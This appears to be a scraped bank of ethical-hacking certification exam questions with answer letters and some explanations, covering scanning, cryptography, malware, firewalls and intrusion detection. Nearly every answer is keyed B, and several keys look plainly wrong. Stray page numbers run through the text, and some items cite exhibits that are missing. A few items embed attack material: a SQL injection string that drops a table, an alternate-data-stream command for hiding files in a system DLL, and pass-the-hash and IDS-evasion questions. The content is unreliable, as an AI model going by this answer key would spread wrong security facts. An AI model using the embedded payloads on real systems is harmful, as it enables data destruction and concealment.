370 An attacker tries to do banner grabbing on a remote web server and executes the following command. $ nmap -sV host.domain.com -p 80 He gets the following output. Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-08 19:10 EST Nmap scan report for host.domain.com (108.61.158.211) Host is up (0.032s latency). PORTSTATESERVICEVERSION 80/tcpopenhttp Apache httpd 212 Service detection performed. Please report any incorrect results at http://nmap.org/submit/. Nmap done: 1 IP address (1 host up) scanned in 6.42 seconds What did the hacker accomplish? A. nmap can't retrieve the version number of any running remote service B. The hacker successfully completed the banner grabbing. C. The hacker should've used nmap -O host.domain.com. D. The hacker failed to do banner grabbing as he didn't get the version of the Apache web server.

B

381 Bob learned that his username and password for a popular game has been compromised. He contacts the company and resets all the information. The company suggests he use two-factor authentication, which option below offers that? A. A new username and password B. A fingerprint scanner and his username and password C. Disable his username and use just a fingerprint scanner. D. His username and a stronger password.

B

384 In order to have an anonymous Internet surf, which of the following is best choice? A. Use SSL sites when entering personal information B. Use Tor network with multi-node C. Use shared WiFi D. Use public VPN

B

391 In many states sending spam is illegal. Thus, the spammers have techniques to try and ensure that no one knows they sent the spam out to thousands of users at a time. Which of the following best describes what spammers use to hide the origin of these types of e-mails? A. A blacklist of companies that have their mail server relays configured to allow traffic only to their specific domain name B. Mail relaying, which is a technique of bouncing e-mail from internal to external mails servers continuously. C. A blacklist of companies that have their mail server relays configured to be wide open. D. Tools that will reconfigure a mail server's relay component to send the e-mail back to the spammers occasionally.

B

392 What is the problem with this ASP script (login.asp)? <% Set objConn = CreateObject("ADODB.Connection") objConn.Open Application("WebUsersConnection") sSQL="SELECT * FROM Users where Username=? & Request("user") & _ "?and Password=? & Request("pwd") & "? Set RS = objConn.Execute(sSQL) If RS.EOF then Response.Redirect("login.asp?msg=Invalid Login") Else Session.Authorized = True 235 Set RS = nothing Set objConn = nothing Response.Redirect("mainpage.asp") End If %> A. The ASP script is vulnerable to XSS attack B. The ASP script is vulnerable to SQL Injection attack C. The ASP script is vulnerable to Session Splice attack D. The ASP script is vulnerable to Cross Site Scripting attack

B

394 Emil uses nmap to scan two hosts using this command. nmap -sS -T4 -O 192.168.99.1 192.168.99.7 He receives this output: Nmap scan report for 192.168.99.1 Host is up (0.00082s latency). Not shown: 994 filtered ports PORT STATE SERVICE 21/tcp open ftp 23/tcp open telnet 53/tcp open domain 80/tcp open http 161/tcp closed snmp MAC Address: B0:75:D5:33:57:74 (ZTE) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 226 OS details: Linux 2.6.9 - 2.6.33 Network Distance: 1 hop Nmap scan report for 192.168.99.7 Host is up (0.000047s latency). All 1000 scanned ports on 192.168.99.7 are closed Too many fingerprints match this host to give specific OS details Network Distance: 0 hops What is his conclusion? A. Host 192.168.99.7 is an iPad B. He performed a SYN scan and OS scan on hosts 192.168.99.1 and 192.168.99.7. C. Host 192.168.99.1 is the host that he launched the scan from. D. Host 192.168.99.7 is down.

B

398 In cryptanalysis and computer security, 'pass the hash' is a hacking technique that allows an attacker to authenticate to a remote server/service by using the underlying NTLM and/or LanMan hash of a user's password, instead of requiring the associated plaintext password as is normally the case. Metasploit Framework has a module for this technique: psexec. The psexec module is often used by penetration testers to obtain access to a given system that you already know the credentials for. It was written by sysinternals and has been integrated within the framework. Often as penetration testers, successfully gain access to a system through some exploit, use meterpreter to grab the passwords or other methods like fgdump, pwdump, or cachedump and then utilize rainbowtables to crack those hash values. Which of the following is true hash type and sort order that is using in the psexec module's 'smbpass'? A. NT:LM B. LM:NT C. LM:NTLM D. NTLM:LM

B

415 What mechanism in Windows prevents a user from accidentally executing a potentially malicious batch (.bat) or PowerShell (.ps1) script? A. User Access Control (UAC) B. Data Execution Prevention (DEP) C. Address Space Layout Randomization (ASLR) D. Windows firewall

B

417 By using a smart card and pin, you are using a two-factor authentication that satisfies A. Something you know and something you are B. Something you have and something you know C. Something you have and something you are D. Something you are and something you remember

B

418 What is the difference between the AES and RSA algorithms? A. Both are asymmetric algorithms, but RSA uses 1024-bit keys. B. RSA is asymmetric, which is used to create a public/private key pair; AES is symmetric, which is used to encrypt data C. Both are symmetric algorithms, but AES uses 256-bit keys. D. AES is asymmetric, which is used to create a public/private key pair; RSA is symmetric, which is used to encrypt data

B

424 As an Ethical Hacker you are capturing traffic from your customer network with Wireshark and you need to find and verify just SMTP traffic. What command in Wireshark will help you to find this kind of traffic? A. request smtp 25 B. tcp.port eq 25 C. smtp port D. tcp.contains port 25

B

425 Which service in a PKI will vouch for the identity of an individual or company? A. KDC B. CA C. CR D. CBC

B

426 In IPv6 what is the major difference concerning application layer vulnerabilities compared to IPv4? A. Implementing IPv4 security in a dual-stack network offers protection from IPv6 attacks too. B. Vulnerabilities in the application layer are independent of the network layer. Attacks and mitigation techniques are almost identical. C. Due to the extensive security measures built in IPv6, application layer vulnerabilities need not be addresses. D. Vulnerabilities in the application layer are greatly different from IPv4.

B

429 ........is an attack type for a rogue Wi-Fi access point that appears to be a legitimate one offered on the premises, but actually has been set up to eavesdrop on wireless communications. It is the wireless version of the phishing scam. An attacker fools wireless users into connecting a laptop or mobile phone to a tainted hotspot by posing as a legitimate provider. This type of attack may be used to steal the passwords of unsuspecting users by either snooping the communication link or by phishing, which involves setting up a fraudulent web site and luring people there. Fill in the blank with appropriate choice. A. Collision Attack B. Evil Twin Attack C. Sinkhole Attack D. Signal Jamming Attack

B

44 A company firewall engineer has configured a new DMZ to allow public systems to be located away from the internal network. The engineer has three security zones set: Untrust (Internet) - (Remote network = 217.77.88.0/24) DMZ (DMZ) - (11.12.13.0/24) Trust (Intranet) - (192.168.0.0/24) The engineer wants to configure remote desktop access from a fixed IP on the remote network to a remote desktop server in the DMZ. Which rule would best fit this requirement? A. Permit 217.77.88.0/24 11.12.13.0/24 RDP 3389 B. Permit 217.77.88.12 11.12.13.50 RDP 3389 C. Permit 217.77.88.12 11.12.13.0/24 RDP 3389 D. Permit 217.77.88.0/24 11.12.13.50 RDP 3389

B

440 Which of the following security policies defines the use of VPN for gaining access to an internal corporate network? A. Network security policy B. Remote access policy C. Information protection policy D. Access control policy

B

445 Matthew received an email with an attachment named "YouWon$10Grand.zip." The zip file contains a file named "HowToClaimYourPrize.docx.exe." Out of excitement and curiosity, Matthew opened the said file. Without his knowledge, the file copies itself to Matthew's APPDATA\IocaI directory and begins to beacon to a Command-and-control server to download additional malicious binaries. What type of malware has Matthew encountered? A. Key-logger B. Trojan C. Worm D. Macro Virus

B

446 Which among the following is a Windows command that a hacker can use to list all the shares to which the current user context has access? A. NET FILE B. NET USE C. NET CONFIG D. NET VIEW

B

449 Rebecca is a security analyst and knows of a local root exploit that has the ability to enable local users to use available exploits to gain root privileges. This vulnerability exploits a condition in the Linux kernel within the execve() system call. There is no known workaround that exists for this vulnerability. What is the correct action to be taken by Rebecca in this situation as a recommendation to management? A. Rebecca should make a recommendation to disable the () system call B. Rebecca should make a recommendation to upgrade the Linux kernel promptly C. Rebecca should make a recommendation to set all child-process to sleep within the execve() D. Rebecca should make a recommendation to hire more system administrators to monitor all child processes to ensure that each child process can't elevate privilege

B

449 Which of the following tools would MOST LIKELY be used to perform security audit on various of forms of network systems? A. Intrusion Detection System B. Vulnerability scanner C. Port scanner D. Protocol analyzer

B

45 A circuit level gateway works at which of the following layers of the OSI Model? A. Layer 5 - Application B. Layer 4 - TCP C. Layer 3 - Internet protocol D. Layer 2 - Data link

B

454 A company recently hired your team of Ethical Hackers to test the security of their network systems. The company wants to have the attack be as realistic as possible. They did not provide any information besides the name of their company. What phase of security testing would your team jump in right away? A. Scanning B. Reconnaissance C. Escalation D. Enumeration

B

456 The chance of a hard drive failure is known to be once every four years. The cost of a new hard drive is $500. EF (Exposure Factor) is about 0.5. Calculate for the Annualized Loss Expectancy (ALE). A. $62.5 B. $250 C. $125 D. $65.2

B

459 While doing a Black box pen test via the TCP port (80), you noticed that the traffic gets blocked when you tried to pass IRC traffic from a web enabled host. However, you also noticed that outbound HTTP traffic is being allowed. What type of firewall is being utilized for the outbound traffic? A. Stateful B. Application C. Circuit D. Packet Filtering

B

461 While doing a technical assessment to determine network vulnerabilities, you used the TCP XMAS scan. What would be the response of all open ports? A. The port will send an ACK B. The port will send a SYN C. The port will ignore the packets D. The port will send an RST

B

468 The programmers on your team are analyzing the free, open source software being used to run FTP services on a server in your organization. They notice that there is excessive number of functions in the source code that might lead to buffer overflow. These C++ functions do not check bounds. Identify the line the source code that might lead to buffer overflow. 281 A. Line number 31. B. Line number 15 C. Line number 8 D. Line number 14

B

476 LM hash is a compromised password hashing function. Which of the following parameters describe LM Hash:? I - The maximum password length is 14 characters. II - There are no distinctions between uppercase and lowercase. III - It's a simple algorithm, so 10,000,000 hashes can be generated per second A. I B. I, II, and III C. II D. I and II

B

480 What tool and process are you going to use in order to remain undetected by an IDS while pivoting and passing traffic over a server you've compromised and gained root access to? A. Install and use Telnet to encrypt all outgoing traffic from this server. B. Install Cryptcat and encrypt outgoing packets from this server. C. Use HTTP so that all traffic can be routed via a browser, thus evading the internal Intrusion Detection Systems. D. Use Alternate Data Streams to hide the outgoing packets from this server.

B

487 A new wireless client that is 802.11 compliant cannot connect to a wireless network given that the client can see the network and it has compatible hardware and software installed. Upon further tests and investigation it was found out that the Wireless Access Point (WAP) was not responding to the association requests being sent by the wireless client. What MOST likely is the issue on this scenario? A. The client cannot see the SSID of the wireless network B. The WAP does not recognize the client's MAC address. C. The wireless client is not configured to use DHCP. D. Client is configured for the wrong channel

B

493 Which specific element of security testing is being assured by using hash? A. Authentication B. Integrity C. Confidentiality D. Availability

B

495 You have performed the traceroute below and notice that hops 19 and 20 both show the same IP address. What can be inferred from this output? 1 172.16.1.254 (172.16.1.254) 0.724 ms 3.285 ms 0.613 ms 2 ip68-98-176-1.nv.nv.cox.net (68.98.176.1) 12.169 ms 14.958 ms 13.416 ms 3 ip68-98-176-1.nv.nv.cox.net (68.98.176.1) 13.948 ms ip68-100-0-1.nv.nv.cox.net (68.100.0.1) 16.743 ms 16.207 ms 4 ip68-100-0-137.nv.nv.cox.net (68.100.0.137) 17.324 ms 12.933 ms 20.938 ms 5 68.1.1.4 (68.1.1.4) 12.439 ms 220.166 ms 204.170 ms 6 so-6-0-0.gar2.wdc1.Level3.net (67.29.170.1) 16.177 ms 25.943 ms 14.104 ms 7 unknown.Level3.net (209.247.9.173) 14.227 ms 17.553 ms 15.415 ms 8 so-0-1-0.bbr1.NewYork1.level3.net (64.159.1.41) 17.063 ms 20.960 ms 19.512 ms 9 so-7-0-0-gar1.NewYork1.Level3.net (64.159.1.182) 20.334 ms 19.440 ms 17.938 ms 10 so-4-0-0.edge1.NewYork1.Level3.net (209.244.17.74) 27.526 ms 18.317 ms 21.202 ms 11 uunet-level3-oc48.NewYork1.Level3.net (209.244.160.12) 21.411 ms 19.133 ms 18.830 ms 12 0.so-6-0-0.XL1.NYC4.ALTER.NET (152.63.21.78) 21.203 ms 22.670 ms 20.11 ms 13 0.so-2-0-0.TL1.NYC8.ALTER.NET (152.63.0.153) 30.929 ms 24.858 ms 23.108 ms 14 0.so-4-1-0.TL1.ATL5.ALTER.NET (152.63.10.129) 38.894 ms 33.244 33.910 ms 15 0.so-7-0-0.XL1.MIA4.ALTER.NET (152.63.86.189) 51.165 ms 49.935 ms 49.466 ms 16 0.so-3-0-0.XR1.MIA4.ALTER.NET (152.63.101.41) 50.937 ms 49.005 ms 51.055 ms 300 17 117.ATM6-0.GW5.MIA1.ALTER.NET (152.63.82.73) 51.897 ms 50.280 ms 53.647 ms 18 example-gwl.customer.alter.net (65.195.239.14) 51.921 ms 51.571 ms 56.855 ms 19 www.ABC.com (65.195.239.22) 52.191 ms 52.571 ms 56.855 ms 20 www.ABC.com (65.195.239.22) 53.561 ms 54.121 ms 58.333 ms A. An application proxy firewall B. A stateful inspection firewall C. A host based IDS D. A Honeypot

B

499 A hacker was able to easily gain access to a website. He was able to log in via the frontend user login form of the website using default or commonly used credentials. This exploitation is an example of what Software design flaw? A. Insufficient security management B. Insufficient database hardening C. Insufficient input validation D. Insufficient exception handling

B

502 A recent security audit revealed that there were indeed several occasions that the company's network was breached. After investigating, you discover that your IDS is not configured properly and therefore is unable to trigger alarms when needed. What type of alert is the IDS giving? A. True Positive B. False Negative C. False Positive D. False Positive

B

51 A consultant is hired to do physical penetration testing at a large financial company. In the first day of his assessment, the consultant goes to the company`s building dressed like an electrician and waits in the lobby for an employee to pass through the main access gate, then the consultant follows the employee behind to get into the restricted area. Which type of attack did the consultant perform? A. Man trap B. Tailgating C. Shoulder surfing D. Social engineering

B

511 What is the advantage in encrypting the communication between the agent and the monitor in an Intrusion Detection System? A. Encryption of agent communications will conceal the presence of the agents B. The monitor will know if counterfeit messages are being generated because they will not be encrypted C. Alerts are sent to the monitor when a potential intrusion is detected D. An intruder could intercept and delete data or alerts and the intrusion can go undetected 310

B

561 Which type of attack is port scanning? A. Web server attack B. Information gathering C. Unauthorized access D. Denial of service attack

B

58 When creating a security program, which approach would be used if senior management is supporting and enforcing the security policy? A. A bottom-up approach B. A top-down approach C. A senior creation approach D. An IT assurance approach

B

60 A security consultant is trying to bid on a large contract that involves penetration testing and reporting. The company accepting bids wants proof of work so the consultant prints out several audits that have been performed. Which of the following is likely to occur as a result? A. The consultant will ask for money on the bid because of great work. B. The consultant may expose vulnerabilities of other companies. C. The company accepting bids will want the same type of format of testing. D. The company accepting bids will hire the consultant because of the great work performed.

B

606 This type of Port Scanning technique splits TCP header into several packets so that the packet filters are not able to detect what the packets intends to do. A. UDP Scanning B. IP Fragment Scanning C. Inverse TCP flag scanning D. ACK flag scanning

B

608 TCP SYN Flood attack uses the three-way handshake mechanism. 1. An attacker at system A sends a SYN packet to victim at system B. 2. System B sends a SYN/ACK packet to victim A. 3. As a normal three-way handshake mechanism system A should send an ACK packet to system B, however, system A does not send an ACK packet to system B. In this case client B is waiting for an ACK packet from client A. This status of client B is called _________________ A. "half-closed" B. "half open" C. "full-open" D. "xmas-open"

B

61 Which type of scan is used on the eye to measure the layer of blood vessels? A. Facial recognition scan B. Retinal scan C. Iris scan D. Signature kinetics scan

B

620 How does traceroute map the route a packet travels from point A to point B? A. Uses a TCP timestamp packet that will elicit a time exceeded in transit message B. Manipulates the value of the time to live (TTL) within packet to elicit a time exceeded in transit message C. Uses a protocol that will be rejected by gateways on its way to the destination D. Manipulates the flags within packets to force gateways into generating error messages

B

621 How do you defend against DHCP Starvation attack? A. Enable ARP-Block on the switch B. Enable DHCP snooping on the switch C. Configure DHCP-BLOCK to 1 on the switch D. Install DHCP filters on the switch to block this attack 375

B

623 Neil is a network administrator working in Istanbul. Neil wants to setup a protocol analyzer on his network that will receive a copy of every packet that passes through the main office switch. What type of port will Neil need to setup in order to accomplish this? A. Neil will have to configure a Bridged port that will copy all packets to the protocol analyzer. B. Neil will need to setup SPAN port that will copy all network traffic to the protocol analyzer. C. He will have to setup an Ether channel port to get a copy of all network traffic to the analyzer. D. He should setup a MODS port which will copy all network traffic.

B

624 In TCP communications there are 8 flags; FIN, SYN, RST, PSH, ACK, URG, ECE, CWR. These flags have decimal numbers assigned to them: FIN = 1 SYN = 2 RST = 4 PSH = 8 ACK = 16 URG = 32 ECE = 64 CWR = 128 Jason is the security administrator of ASPEN Communications. He analyzes some traffic using Wireshark and has enabled the following filters. What is Jason trying to accomplish here? A. SYN, FIN, URG and PSH B. SYN, SYN/ACK, ACK C. RST, PSH/URG, FIN D. ACK, ACK, SYN, URG

B

632 In which part of OSI layer, ARP Poisoning occurs? 381 A. Transport Layer B. Datalink Layer C. Physical Layer D. Application layer

B

633 You want to hide a secret.txt document inside c:\windows\system32\tcpip.dll kernel library using ADS streams. How will you accomplish this? A. copy secret.txt c:\windows\system32\tcpip.dll kernel>secret.txt B. copy secret.txt c:\windows\system32\tcpip.dll:secret.txt C. copy secret.txt c:\windows\system32\tcpip.dll |secret.txt D. copy secret.txt >< c:\windows\system32\tcpip.dll kernel secret.txt

B

636 This attack technique is used when a Web application is vulnerable to an SQL Injection but the results of the Injection are not visible to the attacker. A. Unique SQL Injection B. Blind SQL Injection C. Generic SQL Injection D. Double SQL Injection

B

647 Fake Anti-Virus, is one of the most frequently encountered and persistent threats on the web. This 390 malware uses social engineering to lure users into infected websites with a technique called Search Engine Optimization. Once the Fake AV is downloaded into the user's computer, the software will scare them into believing their system is infected with threats that do not really exist, and then push users to purchase services to clean up the non-existent threats. The Fake AntiVirus will continue to send these annoying and intrusive alerts until a payment is made. What is the risk of installing Fake AntiVirus? A. Victim's Operating System versions, services running and applications installed will be published on Blogs and Forums B. Victim's personally identifiable information such as billing address and credit card details, may be extracted and exploited by the attacker C. Once infected, the computer will be unable to boot and the Trojan will attempt to format the hard disk D. Denial of Service attack will be launched against the infected computer crashing other machines on the connected network

B

653 Steven the hacker realizes the network administrator of Acme Corporation is using syskey in Windows 2008 Server to protect his resources in the organization. Syskey independently encrypts the hashes so that physical access to the server, tapes, or ERDs is only first step to cracking the passwords. Steven must break through the encryption used by syskey before he can attempt to use brute force dictionary attacks on the hashes. Steven runs a program called "SysCracker" targeting the Windows 2008 Server machine in attempting to crack the hash used by Syskey. He needs to configure the encryption level before he can launch the attack. How many bits does Syskey use for encryption? A. 40-bit encryption B. 128-bit encryption C. 256-bit encryption D. 64-bit encryption

B

654 Ursula is a college student at a University in Amsterdam. Ursula originally went to college to study 395 engineering but later changed to marine biology after spending a month at sea with her friends. These friends frequently go out to sea to follow and harass fishing fleets that illegally fish in foreign waters. Ursula eventually wants to put companies practicing illegal fishing out of business. Ursula decides to hack into the parent company's computers and destroy critical data knowing fully well that, if caught, she probably would be sent to jail for a very long time. What would Ursula be considered? A. Ursula would be considered a gray hat since she is performing an act against illegal activities. B. She would be considered a suicide hacker. C. She would be called a cracker. D. Ursula would be considered a black hat.

B

669 This method is used to determine the Operating system and version running on a remote target system. What is it called? A. Service Degradation B. OS Fingerprinting C. Manual Target System D. Identification Scanning

B

672 What framework architecture is shown in this exhibit? 406 A. Core Impact B. Metasploit C. Immunity Canvas D. Nessus

B

677 Hampton is the senior security analyst for the city of Columbus in Ohio. His primary responsibility is to ensure that all physical and logical aspects of the city's computer network are secure from all angles. Bill is an IT technician that works with Hampton in the same IT department. Bill's primary responsibility is to keep PC's and servers up to date and to keep track of all the agency laptops that the company owns and lends out to its employees. After Bill setup a wireless network for the agency, Hampton made sure that everything was secure. He instituted encryption, rotating keys, turned off SSID broadcasting, and enabled MAC filtering. According to agency policy, only company laptops are allowed to use the wireless network, so Hampton entered all the MAC addresses for those laptops into the wireless security utility so that only those laptops should be able to access the wireless network. Hampton does not keep track of all the laptops, but he is pretty certain that the agency only purchases Dell laptops. Hampton is curious about this because he notices Bill working on a Toshiba laptop one day and saw that he was on the Internet. Instead of jumping to conclusions, 409 Hampton decides to talk to Bill's boss and see if they had purchased a Toshiba laptop instead of the usual Dell. Bill's boss said no, so now Hampton is very curious to see how Bill is accessing the Internet. Hampton does site surveys every couple of days, and has yet to see any outside wireless network signals inside the company's building. How was Bill able to get Internet access without using an agency laptop? A. Bill spoofed the MAC address of Dell laptop B. Bill connected to a Rogue access point C. Toshiba and Dell laptops share the same hardware address D. Bill brute forced the Mac address ACLs

B

682 What type of Virus is shown here? A. Macro Virus B. Cavity Virus C. Boot Sector Virus D. Metamorphic Virus E. Sparse Infector Virus

B

683 John is using a special tool on his Linux platform that has a database containing signatures to be able to detect hundreds of vulnerabilities in UNIX, Windows, and commonly used web CGI/ASPX scripts. Moreover, the database detects DDoS zombies and Trojans as well. What would be the name of this tool? A. hping2 B. nessus C. nmap D. make

B

689 File extensions provide information regarding the underlying server technology. Attackers can use this information to search vulnerabilities and launch attacks. How would you disable file extensions in Apache servers? 415 A. Use disable-eXchange B. Use mod_negotiation C. Use Stop_Files D. Use Lib_exchanges

B

693 What type of encryption does WPA2 use? A. DES 64 bit B. AES-CCMP 128 bit C. MD5 48 bit D. SHA 160 bit

B

70 The precaution of prohibiting employees from bringing personal computing devices into a facility is what type of security control? A. Physical B. Procedural C. Technical D. Compliance

B

75 Which of the following is an example of an asymmetric encryption implementation? A. SHA1 B. PGP C. 3DES D. MD5

B

76 A hacker was able to sniff packets on a company's wireless network. The following information was discovered: The Key 10110010 01001011 The Cyphertext 01100101 01011010 Using the Exclusive OR, what was the original message? A. 00101000 11101110 B. 11010111 00010001 C. 00001101 10100100 D. 11110010 01011011

B

764 What will the following command produce on a website's login page if executed successfully? SELECT email, passwd, login_id, full_name FROM members WHERE email ='[email protected]'; DROP TABLE members; --' A. This code will insert the [email protected] email address into the members table. B. This command will delete the entire members table. C. It retrieves the password for the first user in the members table. D. This command will not produce anything since the syntax is incorrect.

B

80 What is the most secure way to mitigate the theft of corporate information from a laptop that was left in a hotel room? A. Set a BIOS password. B. Encrypt the data on the hard drive. C. Use a strong logon password to the operating system. D. Back up everything on the laptop and store the backup in a safe place.

B

92 During a penetration test, a tester finds that the web application being analyzed is vulnerable to Cross Site Scripting (XSS). Which of the following conditions must be met to exploit this vulnerability? A. The web application does not have the secure flag set. B. The session cookies do not have the HttpOnly flag set. C. The victim user should not have an endpoint security solution. D. The victim's browser must have ActiveX technology enabled.

B

93 A specific site received 91 ICMP_ECHO packets within 90 minutes from 47 different sites. 77 of the ICMP_ECHO packets had an ICMP ID:39612 and Seq:57072. 13 of the ICMP_ECHO packets had an ICMP ID:0 and Seq:0. What can you infer from this information? A. The packets were sent by a worm spoofing the IP addresses of 47 infected sites 54 B. ICMP ID and Seq numbers were most likely set by a tool and not by the operating system C. All 77 packets came from the same LAN segment and hence had the same ICMP ID and Seq number D. 13 packets were from an external network and probably behind a NAT, as they had an ICMP ID 0 and Seq 0

B

96 When an alert rule is matched in a network-based IDS like snort, the IDS does which of the following? A. Drops the packet and moves on to the next one B. Continues to evaluate the packet until all rules are checked C. Stops checking rules, sends an alert, and lets the packet continue D. Blocks the connection with the source IP address in the packet

B

97 Which type of intrusion detection system can monitor and alert on attacks, but cannot stop them? A. Detective B. Passive C. Intuitive D. Reactive

B

18 To what does "message repudiation" refer to what concept in the realm of email security? A. Message repudiation means a user can validate which mail server or servers a message was passed through. B. Message repudiation means a user can claim damages for a mail message that damaged their reputation. C. Message repudiation means a recipient can be sure that a message was sent from a particular person. D. Message repudiation means a recipient can be sure that a message was sent from a certain host. E. Message repudiation means a sender can claim they did not actually send a particular message.

E (Explanation: A quality that prevents a third party from being able to prove that a communication between two other parties ever took place. This is a desirable quality if you do not want your communications to be traceable. Non-repudiation is the opposite quality—a third party can prove that a communication between two other parties took place. Non-repudiation is desirable if you want to be able to trace your 11 communications and prove that they occurred. Repudiation - Denial of message submission or delivery.)

457 Bob is a Junior Administrator at ABC Company. On One of Linux machine he entered the following firewall rules: iptables -t filter -A INPUT -p tcp --dport 23 -j DROP 274 Why he entered the above line? A. To accept the Telnet connection B. To deny the Telnet connection C. The accept all connection except telnet connection D. None of Above

B (Explanation: -t, --table This option specifies the packet matching table which the command should operate on. If the kernel is configured with automatic module loading, an attempt will be made to load the appropriate module for that table if it is not already there. The tables are as follows: filter This is the default table, and contains the built-in chains INPUT (for packets coming into the box itself), FORWARD (for packets being routed through the box), and OUTPUT (for locally-generated packets). nat This table is consulted when a packet which is creates a new connection is encountered. It consists of three built-ins: PREROUTING (for altering packets as soon as they come in), OUTPUT (for altering locally-generated packets before routing), and POSTROUTING (for altering packets as they are about to go out). mangle This table is used for specialized packet alteration. It has two built-in chains: PREROUTING (for altering incoming packets before routing) and OUTPUT (for altering locally-generated packets before routing). -A, --append Append one or more rules to the end of the selected chain. When the source and/or destination names resolve to more than one address, a rule will be added for each possible address combination. -p, --protocol [!] protocol The protocol of the rule or of the packet to check. The specified protocol can be one of tcp, udp, icmp, or all, or it can be a numeric value, representing one of these protocols or a different one. Also a protocol name from /etc/protocols is allowed. A "!" argument before the protocol inverts the test. The number zero is equivalent to all. Protocol all will match with all protocols and is taken as default when this option is omitted. All may not be used in in combination with the check command. --destination-port [!] [port[:port]] Destination port or port range specification. The flag --dport is an alias for this option. -j, --jump target This specifies the target of the rule; ie. what to do if the packet matches it. The target can be a user-defined chain (not the one this rule is in), one of the special builtin targets which decide the fate of the packet immediately, or an extension (see EXTENSIONS below). If this option is omitted in a rule, then matching the rule will have no effect on the packet's fate, but the counters on the rule will be incremented. 275)

229 What is a Trojan Horse? A. A malicious program that captures your username and password B. Malicious code masquerading as or replacing legitimate code C. An unauthorized user who gains access to your user database and adds themselves as a user D. A server that is to be sacrificed to all hacking attempts in order to log and monitor the hacking activity

B (Explanation: A Trojan Horse is an apparently useful and innocent program containing additional hidden code which allows the unauthorized collection, exploitation, falsification, or destruction of data.)

197 While examining audit logs, you discover that people are able to telnet into the SMTP server on port 25. You would like to block this, though you do not see any evidence of an 117 attack or other wrong doing. However, you are concerned about affecting the normal functionality of the email server. From the following options choose how best you can achieve this objective? A. Block port 25 at the firewall. B. Shut off the SMTP service on the server. C. Force all connections to use a username and password. D. Switch from Windows Exchange to UNIX Sendmail. E. None of the above.

E (Explanation: Blocking port 25 in the firewall or forcing all connections to use username and password would have the consequences that the server is unable to communicate with other SMTP servers. Turning of the SMTP service would disable the email function completely. All email servers use SMTP to communicate with other email servers and therefore changing email server will not help.)

64 What is the proper response for a FIN scan if the port is closed? 39 A. SYN B. ACK C. FIN D. PSH E. RST

E (Explanation: Closed ports respond to a FIN scan with a RST.)

137 What is the proper response for a NULL scan if the port is closed? A. SYN B. ACK C. FIN D. PSH E. RST F. No response

E (Explanation: Closed ports respond to a NULL scan with a reset.)

66 What is the proper response for a X-MAS scan if the port is closed? 40 A. SYN B. ACK C. FIN D. PSH E. RST F. No response

E (Explanation: Closed ports respond to a X-MAS scan with a RST.)

278 What happens when one experiences a ping of death? A. This is when an IP datagram is received with the "protocol" field in the IP header set to 1 (ICMP) and the "type" field in the ICMP header is set to 18 (Address Mask Reply). 167 B. This is when an IP datagram is received with the "protocol" field in the IP header set to 1 (ICMP), the Last Fragment bit is set, and (IP offset ' 8) + (IP data length) >65535. In other words, the IP offset (which represents the starting position of this fragment in the original packet, and which is in 8-byte units) plus the rest of the packet is greater than the maximum size for an IP packet. C. This is when an IP datagram is received with the "protocol" field in the IP header set to 1 (ICMP) and the source equal to destination address. D. This is when an the IP header is set to 1 (ICMP) and the "type" field in the ICMP header is set to 5 (Redirect).

B (Explanation: A hacker can send an IP packet to a vulnerable machine such that the last fragment contains an offest where (IP offset *8) + (IP data length)>65535. This means that when the packet is reassembled, its total length is larger than the legal limit, causing buffer overruns in the machine's OS (becouse the buffer sizes are defined only to accomodate the maximum allowed size of the packet based on RFC 791)...IDS can generally recongize such attacks by looking for packet fragments that have the IP header's protocol field set to 1 (ICMP), the last bit set, and (IP offset *8) +(IP data length)>65535" CCIE Professional Development Network Security Principles and Practices by Saadat Malik pg 414 "Ping of Death" attacks cause systems to react in an unpredictable fashion when receiving oversized IP packets. TCP/IP allows for a maximum packet size of up to 65536 octets (1 octet = 8 bits of data), containing a minimum of 20 octets of IP header information and zero or more octets of optional information, with the rest of the packet being data. Ping of Death attacks can cause crashing, freezing, and rebooting.)

177 If a token and 4-digit personal identification number (PIN) are used to access a computer system and the token performs off-line checking for the correct PIN, what type of attack is possible? 106 A. Birthday B. Brute force C. Man-in-the-middle D. Smurf

B (Explanation: Brute force attacks are performed with tools that cycle through many possible character, number, and symbol combinations to guess a password. Since the token allows offline checking of PIN, the cracker can keep trying PINS until it is cracked.)

580 Giles is the network administrator for his company, a graphics design company based in Dallas. Most of the network is comprised of Windows servers and workstations, except for some designers that prefer to use MACs. These MAC users are running on the MAC OS X operating system. These MAC users also utilize iChat to talk between each other. Tommy, one of these MAC users, calls Giles and says that his computer is running very slow. Giles then gets more calls from the other MAC users saying they are receiving instant messages from Tommy even when he says he is not on his computer. Giles immediately unplugs Tommy's computer from the network to take a closer look. He opens iChat on Tommy's computer and it says that it sent a file called latestpics.tgz to all the other MAC users. Tommy says he never sent those files. Giles also sees that many of the computer's applications appear to be altered. The path where the files should be has an altered file and the original application is stored in the file's resource fork. What has Giles discovered on Tommy's computer? A. He has discovered OSX/Chat-burner virus on Tommy's computer B. Giles has found the OSX/Leap-A virus on Tommy's computer C. This behavior is indicative of the OSX/Inqtana.A virus D. On Tommy's computer, Giles has discovered an apparent infection of the OSX/Transmitter.B virus

B (Explanation: OSX.Leap.A is a worm that targets installs of Macintosh OS X and spreads via iChat Instant Messenger program. http://www.symantec.com/security_response/writeup.jsp?docid=2006-021614-4006-99)

577 Theresa is the chief information security officer for her company, a large shipping company based out of New York City. In the past, Theresa and her IT employees manually checked the status of client computers on the network to see if they had the most recent Microsoft updates. Now that the company has added over 100 more clients to accommodate new departments, Theresa must find some kind of tool to see whether the clients are up-to-date or not. Theresa decides to use Qfecheck to monitor all client computers. When Theresa runs the tool, she is repeatedly told that the software does not have the proper permissions to scan. Theresa is worried that the operating system hardening that she performs on all clients is keeping the software from scanning the necessary registry keys on the client computers. What registry key permission should Theresa check to ensure that Qfecheck runs properly? A. In order for Qfecheck to run properly, it must have enough permission to read B. She needs to check the permissions of the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates registry key C. Theresa needs to look over the permissions of the registry key D. The registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Microsoft must be checked

B (Explanation: Qfecheck check the registry HKLM\Software\Microsoft\Updates)

